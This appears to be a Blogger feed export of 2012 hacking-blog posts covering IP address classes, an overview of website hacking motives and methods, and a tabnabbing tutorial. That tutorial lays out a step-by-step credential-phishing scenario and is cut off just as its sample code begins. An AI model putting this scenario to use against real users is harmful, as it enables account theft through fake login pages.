&lt;span style="color: #cc0000;"&gt;&lt;b&gt;EXTRA&lt;/b&gt;&lt;/span&gt;:&lt;span style="color: #38761d;"&gt;&lt;b&gt;Distinguishing different groups:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;You have to compare the first byte on the left in the address as follows:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Type |&amp;nbsp;&amp;nbsp;&amp;nbsp; First byte&amp;nbsp; | MSB&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp; in decimal&amp;nbsp; |&lt;br /&gt;----------------------------&lt;br /&gt;A&amp;nbsp;&amp;nbsp;&amp;nbsp; | 1-127&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 0&lt;br /&gt;----------------------------&lt;br /&gt;B&amp;nbsp;&amp;nbsp;&amp;nbsp; | 128-191&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 10&lt;br /&gt;----------------------------&lt;br /&gt;C&amp;nbsp;&amp;nbsp;&amp;nbsp; | 192-223&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 110&lt;br /&gt;----------------------------&lt;br /&gt;D&amp;nbsp;&amp;nbsp;&amp;nbsp; | 224-239&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 1110&lt;br /&gt;----------------------------&lt;br /&gt;E&amp;nbsp;&amp;nbsp;&amp;nbsp; | 240-254&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 1111&lt;br /&gt;----------------------------&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;NOTES:&lt;/b&gt;&lt;/span&gt; &lt;span style="color: #38761d;"&gt;&lt;b&gt;Yes, we know, we've left A LOT of things unexplained in this text.&lt;br /&gt;With time, we will write more tutorials to cover these and other subjects. So&lt;br /&gt;in the meantime, I suggest that you go to http://blacksun.box.sk, find the&lt;br /&gt;tutorials page and see if there's anything else that's interesting to you.&lt;br /&gt;And remember - we also have a message board, so if you have any questions,&lt;br /&gt;feel free to post them there.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;1) Multicast: (copied from RFC 1112)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &lt;span style="color: #38761d;"&gt;&lt;b&gt;IP multicasting is the transmission of an IP datagram to a "host&lt;br /&gt;&amp;nbsp; group", a set of zero or more hosts identified by a single IP&lt;br /&gt;&amp;nbsp; destination address.&amp;nbsp; A multicast datagram is delivered to all&lt;br /&gt;&amp;nbsp; members of its destination host group with the same "best-efforts"&lt;br /&gt;&amp;nbsp; reliability as regular unicast IP datagrams, i.e., the datagram is&lt;br /&gt;&amp;nbsp; not guaranteed to arrive intact at all members of the destination&lt;br /&gt;&amp;nbsp; group or in the same order relative to other daiagrams.&lt;br /&gt;&lt;br /&gt;&amp;nbsp; The membership of a host group is dynamic; that is, hosts may join&lt;br /&gt;&amp;nbsp; and leave groups at any time.&amp;nbsp; There is no restriction on the&lt;br /&gt;&amp;nbsp; location or number of members in a host group.&amp;nbsp; A host may be a&lt;br /&gt;&amp;nbsp; member of more than one group at a time.&amp;nbsp; A host need not be a member&lt;br /&gt;&amp;nbsp; of a group to send datagrams to it.&lt;br /&gt;&lt;br /&gt;&amp;nbsp; A host group may be permanent or transient.&amp;nbsp; A permanent group has a&lt;br /&gt;&amp;nbsp; well-known, administratively assigned IP address.&amp;nbsp; It is the address,&lt;br /&gt;&amp;nbsp; not the membership of the group, that is permanent; at any time a&lt;br /&gt;&amp;nbsp; permanent group may have any number of members, even zero.&amp;nbsp; Those IP&lt;br /&gt;&amp;nbsp; multicast addresses that are not reserved for permanent groups are&lt;br /&gt;&amp;nbsp; available for dynamic assignment to transient groups which exist only&lt;br /&gt;&amp;nbsp; as long as they have members.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp; Internetwork forwarding of IP multicast datagrams(ip packets)is handled by&lt;br /&gt;&amp;nbsp; "multicast routers" which may be co-resident with, or separate from,&lt;br /&gt;&amp;nbsp; internet gateways.&amp;nbsp; A host transmits an IP multicast datagram as a&lt;br /&gt;&amp;nbsp; local network multicast which reaches all immediately-neighboring&lt;br /&gt;&amp;nbsp; members of the destination host group.&amp;nbsp; If the datagram has an IP&lt;br /&gt;&amp;nbsp; time-to-live greater than 1, the multicast router(s) attached to the&lt;br /&gt;&amp;nbsp; local network take responsibility for forwarding it towards all other&lt;br /&gt;&amp;nbsp; networks that have members of the destination group.&amp;nbsp; On those other&lt;br /&gt;&amp;nbsp; member networks that are reachable within the IP time-to-live, an&lt;br /&gt;&amp;nbsp; attached multicast router completes delivery by transmitting the&lt;br /&gt;&amp;nbsp; datagram(ip packet) as a local multicast.&lt;br /&gt;&amp;nbsp; *if you donot understand the above do not worry, it is complicated and dry&lt;br /&gt;&amp;nbsp; but reread it and read it again get a dictionary if it helps.&lt;br /&gt;&amp;nbsp; Hacking is not easy.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;2) MSB: Most Significent Bit:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &lt;span style="color: #38761d;"&gt;&lt;b&gt;In set numbers the first number on the left is the most important because it&lt;br /&gt;&amp;nbsp; holds the highest value as opposed to the LSB=&amp;gt; least significent bit, it&lt;br /&gt;&amp;nbsp; always holds the the smallest value.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/3375146004834888210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=3375146004834888210&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/3375146004834888210?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/3375146004834888210?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/ip-address-structure-introduction.html' title='IP Address Structure Introduction !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-XtSzfo55BCE/UHlHb1Cqd6I/AAAAAAAAALM/nNGIaH23i0Q/s72-c/ip.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;AkMGR349fip7ImA9WhNTE0w.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-342077703148436469</id><published>2012-10-15T22:25:00.000+06:00</published><updated>2012-10-15T22:27:06.066+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-15T22:27:06.066+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='web Site Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title> Hack Website : Basic Information About Website Hacking Part 1</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;&amp;nbsp;Hack Website : Basic Information About Website Hacking Part 1&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-pThqtbncADI/UHw33bsu1UI/AAAAAAAAAL8/eDbEIN646e4/s1600/basic+hack.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-pThqtbncADI/UHw33bsu1UI/AAAAAAAAAL8/eDbEIN646e4/s320/basic+hack.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;span style="color: #cc0000;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;Well I have posted lots of articles on Email Hacking which includes &lt;a href="http://www.made-by-bangladesh.blogspot.com/2012/09/facebook-hackinghotmail-hackinggmail.html" target="_blank"&gt;Phishing&lt;/a&gt; and &lt;a href="http://www.made-by-bangladesh.blogspot.com/2012/09/keylogger-its-hacking-tools.html" target="_blank"&gt;keylogging&lt;/a&gt; etc, but today I would like to throw some light on new topic which is "Website Hacking". Today i am first time writing article on "Website Hacking". why I am writing this article as there are lots of newbies having lots of misconceptions related hacking website, So I hope this tutorial cover all those misconception and if not all most of them.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available such as SQL Injection through which even a newbie can find a vulnerable site and start Hacking in just few minutes.&lt;/b&gt;&lt;/span&gt;&lt;span style="color: #cc0000;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Basic Information About Website Hacking&lt;br /&gt;What is a website hack?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.&lt;br /&gt;&lt;br /&gt;With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.&lt;br /&gt;&lt;br /&gt;Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.&lt;br /&gt;&lt;br /&gt;People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.&lt;br /&gt;&lt;br /&gt;Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Who are the hackers?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-SD9DX_LjzZg/UHw4gV4U7jI/AAAAAAAAAME/vvA67CPKIjs/s1600/basichack1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-SD9DX_LjzZg/UHw4gV4U7jI/AAAAAAAAAME/vvA67CPKIjs/s1600/basichack1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.&lt;br /&gt;&lt;br /&gt;Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.&lt;br /&gt;&lt;br /&gt;And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Why do they do it? What do they want?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because their methods are illegal!&lt;br /&gt;&lt;br /&gt;To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your visitors' confidential financial information. They want credit card and Social Security numbers, FTP passwords, website logins, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Theft methods:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; They copy your customer database.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; They install spyware or phishing pages in your site, to grab data as your customers log in.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your mail server, for sending spam.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Free use of your server's processing power, to reprogram however they want.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Examples:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: #38761d;"&gt;&lt;b&gt;Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Illegal pornographic content.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Use your webspace to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your traffic. They put visible links on your pages that visitors on your site can follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your money, by extortion, threatening to launch a worse attack against your site if you don't pay them.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Common Methods used for Website Hacking&lt;/b&gt;&lt;/span&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;There are lots of methods that can be used to hack a website but most common ones are as follows:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: magenta;"&gt;&lt;b&gt;SQL Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross Site Scripting (XSS)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Remote File Inclusion(RFI)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Local File inclusion(LFI)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Directory Traversal&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross-site request forgery( CSRF )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; SSI Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; LDAP Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; XPath Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Denial of Service - DOS Attacks&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;In this article, I have just shared basic information on Hacking Website. I hope you have liked the post uptill now, I will cover the method to hack website in the next post, So stay tuned !.&lt;/b&gt;&lt;/span&gt;
&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Remember Hacking Is Crime.This tutorial is Educational purpose only'); return true" type="button" value="Note" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/342077703148436469/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=342077703148436469&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/342077703148436469?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/342077703148436469?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/hack-website-basic-information-about.html' title=' Hack Website : Basic Information About Website Hacking Part 1'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-pThqtbncADI/UHw33bsu1UI/AAAAAAAAAL8/eDbEIN646e4/s72-c/basic+hack.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;C0YEQ387eyp7ImA9WhNTEk0.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-730174887087099073</id><published>2012-10-14T13:03:00.003+06:00</published><updated>2012-10-14T13:51:42.103+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-14T13:51:42.103+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>The Advance Hacking TabNabbing !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello Visitor,&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-_lEdWed8aJY/UHpjk10GDoI/AAAAAAAAALs/d1m549U0xoc/s1600/Advance-Tabnabbing-2012.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-_lEdWed8aJY/UHpjk10GDoI/AAAAAAAAALs/d1m549U0xoc/s1600/Advance-Tabnabbing-2012.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Today I will explain this tutorial&amp;nbsp; using attack scenario and live example and how to protect yourself from such stuff.&lt;br /&gt;Let consider a attack scenario:&lt;br /&gt;1. A hacker say(me Sajal) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)&lt;br /&gt;2. I (Sajal) sends a copy of this web page to victim whose account or whatever i want to hack.&lt;br /&gt;3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.&lt;br /&gt;4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.&lt;br /&gt;5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.&lt;br /&gt;6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.&lt;br /&gt;Here end's the attack scenario for advanced tabnabbing.&lt;br /&gt;&lt;br /&gt;&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;left&gt;
&lt;/left&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;form&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;input class="btnLogin" onclick="alert('This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.'); return true" type="button" value="Note" /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/form&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;

&lt;!-- End of Message Alert --&gt;Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.&lt;br /&gt;&lt;br /&gt;Follow below measure to protect yourself from Tabnabbing:&lt;br /&gt;1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.&lt;br /&gt;2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.&lt;br /&gt;3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.&lt;br /&gt;4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.&lt;br /&gt;5. If you use &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/web-developer/" target="_blank"&gt;ideveloper&lt;/a&gt; or &lt;a href="http://getfirebug.com/downloads" target="_blank"&gt;Firebug&lt;/a&gt;, then verify the headers by yourself if you find something suspicious.&lt;br /&gt;&lt;br /&gt;That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..&lt;br /&gt;&lt;br /&gt;Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.&lt;br /&gt;&lt;br /&gt;First sample code for doing tabnabbing with the help of iframes: &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: magenta;"&gt;&amp;lt;!--&lt;br /&gt;Title: Advanced Tabnabbing using IFRAMES and Java script&lt;br /&gt;Author: De$trUcTiVe M!ND (passward@2daymail.co.cc)&lt;br /&gt;Website: 